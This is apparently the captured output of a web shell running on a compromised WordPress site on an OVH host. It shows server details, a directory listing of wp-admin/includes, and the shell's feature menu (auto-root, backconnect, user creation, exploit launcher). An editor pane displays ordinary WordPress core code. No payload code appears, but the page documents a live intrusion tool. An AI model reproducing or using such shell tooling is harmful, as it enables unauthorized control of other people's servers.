Linux webm001.cluster105.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.105.20.1 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.0.30
afriquejlc
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
afriquejlc /
www /
wp-admin /
includes /
[ HOME SHELL ]
Name
Size
Permission
Action
admin-filters.php
7.81
KB
-rwxr-xr-x
ajax-actions.php
148.17
KB
-rwxr-xr-x
class-bulk-upgrader-skin.php
5.57
KB
-rwxr-xr-x
class-core-upgrader.php
14.65
KB
-rwxr-xr-x
class-ftp.php
26.66
KB
-rwxr-xr-x
class-pclzip.php
192.08
KB
-rwxr-xr-x
class-plugin-installer-skin.ph...
11.65
KB
-rwxr-xr-x
class-plugin-upgrader.php
22.78
KB
-rwxr-xr-x
class-wp-ajax-upgrader-skin.ph...
4.09
KB
-rwxr-xr-x
class-wp-community-events.php
18.33
KB
-rwxr-xr-x
class-wp-filesystem-base.php
23.84
KB
-rwxr-xr-x
class-wp-filesystem-ssh2.php
22.76
KB
-rwxr-xr-x
class-wp-plugins-list-table.ph...
49.21
KB
-rwxr-xr-x
class-wp-post-comments-list-ta...
1.42
KB
-rwxr-xr-x
class-wp-screen.php
36.42
KB
-rwxr-xr-x
class-wp-site-icon.php
6.15
KB
-rwxr-xr-x
comment.php
5.98
KB
-rwxr-xr-x
credits.php
5.8
KB
-rwxr-xr-x
dashboard.php
68.47
KB
-rwxr-xr-x
deprecated.php
40.79
KB
-rwxr-xr-x
export.php
23.57
KB
-rwxr-xr-x
file.php
96.07
KB
-rwxr-xr-x
image-edit.php
42
KB
-rwxr-xr-x
import.php
6.52
KB
-rwxr-xr-x
list-table.php
3.71
KB
-rwxr-xr-x
menu.php
9.37
KB
-rwxr-xr-x
meta-boxes.php
64.5
KB
-rwxr-xr-x
misc.php
44.8
KB
-rwxr-xr-x
ms-deprecated.php
3.68
KB
-rwxr-xr-x
ms.php
33.12
KB
-rwxr-xr-x
network.php
26.92
KB
-rwxr-xr-x
noop.php
1.12
KB
-rwxr-xr-x
options.php
4.06
KB
-rwxr-xr-x
plugin.php
87.77
KB
-rwxr-xr-x
post.php
79.14
KB
-rwxr-xr-x
privacy-tools.php
32.68
KB
-rwxr-xr-x
schema.php
41.9
KB
-rwxr-xr-x
screen.php
6.21
KB
-rw-r--r--
theme-install.php
6.82
KB
-rwxr-xr-x
update.php
34.83
KB
-rwxr-xr-x
upgrade.php
109.52
KB
-rwxr-xr-x
user.php
22.92
KB
-rwxr-xr-x
widgets.php
10.66
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ms-deprecated.php
<?php /** * Multisite: Deprecated admin functions from past versions and WordPress MU * * These functions should not be used and will be removed in a later version. * It is suggested to use for the alternatives instead when available. * * @package WordPress * @subpackage Deprecated * @since 3.0.0 */ /** * Outputs the WPMU menu. * * @deprecated 3.0.0 */ function wpmu_menu() { _deprecated_function( __FUNCTION__, '3.0.0' ); // Deprecated. See #11763. } /** * Determines if the available space defined by the admin has been exceeded by the user. * * @deprecated 3.0.0 Use is_upload_space_available() * @see is_upload_space_available() */ function wpmu_checkAvailableSpace() { _deprecated_function( __FUNCTION__, '3.0.0', 'is_upload_space_available()' ); if ( ! is_upload_space_available() ) { wp_die( sprintf( /* translators: %s: Allowed space allocation. */ __( 'Sorry, you have used your space allocation of %s. Please delete some files to upload more files.' ), size_format( get_space_allowed() * MB_IN_BYTES ) ) ); } } /** * WPMU options. * * @deprecated 3.0.0 */ function mu_options( $options ) { _deprecated_function( __FUNCTION__, '3.0.0' ); return $options; } /** * Deprecated functionality for activating a network-only plugin. * * @deprecated 3.0.0 Use activate_plugin() * @see activate_plugin() */ function activate_sitewide_plugin() { _deprecated_function( __FUNCTION__, '3.0.0', 'activate_plugin()' ); return false; } /** * Deprecated functionality for deactivating a network-only plugin. * * @deprecated 3.0.0 Use deactivate_plugin() * @see deactivate_plugin() */ function deactivate_sitewide_plugin( $plugin = false ) { _deprecated_function( __FUNCTION__, '3.0.0', 'deactivate_plugin()' ); } /** * Deprecated functionality for determining if the current plugin is network-only. * * @deprecated 3.0.0 Use is_network_only_plugin() * @see is_network_only_plugin() */ function is_wpmu_sitewide_plugin( $file ) { _deprecated_function( __FUNCTION__, '3.0.0', 'is_network_only_plugin()' ); return is_network_only_plugin( $file ); } /** * Deprecated functionality for getting themes network-enabled themes. * * @deprecated 3.4.0 Use WP_Theme::get_allowed_on_network() * @see WP_Theme::get_allowed_on_network() */ function get_site_allowed_themes() { _deprecated_function( __FUNCTION__, '3.4.0', 'WP_Theme::get_allowed_on_network()' ); return array_map( 'intval', WP_Theme::get_allowed_on_network() ); } /** * Deprecated functionality for getting themes allowed on a specific site. * * @deprecated 3.4.0 Use WP_Theme::get_allowed_on_site() * @see WP_Theme::get_allowed_on_site() */ function wpmu_get_blog_allowedthemes( $blog_id = 0 ) { _deprecated_function( __FUNCTION__, '3.4.0', 'WP_Theme::get_allowed_on_site()' ); return array_map( 'intval', WP_Theme::get_allowed_on_site( $blog_id ) ); } /** * Deprecated functionality for determining whether a file is deprecated. * * @deprecated 3.5.0 */ function ms_deprecated_blogs_file() {} if ( ! function_exists( 'install_global_terms' ) ) : /** * Install global terms. * * @since 3.0.0 * @since 6.1.0 This function no longer does anything. * @deprecated 6.1.0 */ function install_global_terms() { _deprecated_function( __FUNCTION__, '6.1.0' ); } endif; /** * Synchronizes category and post tag slugs when global terms are enabled. * * @since 3.0.0 * @since 6.1.0 This function no longer does anything. * @deprecated 6.1.0 * * @param WP_Term|array $term The term. * @param string $taxonomy The taxonomy for `$term`. * @return WP_Term|array Always returns `$term`. */ function sync_category_tag_slugs( $term, $taxonomy ) { _deprecated_function( __FUNCTION__, '6.1.0' ); return $term; }
Close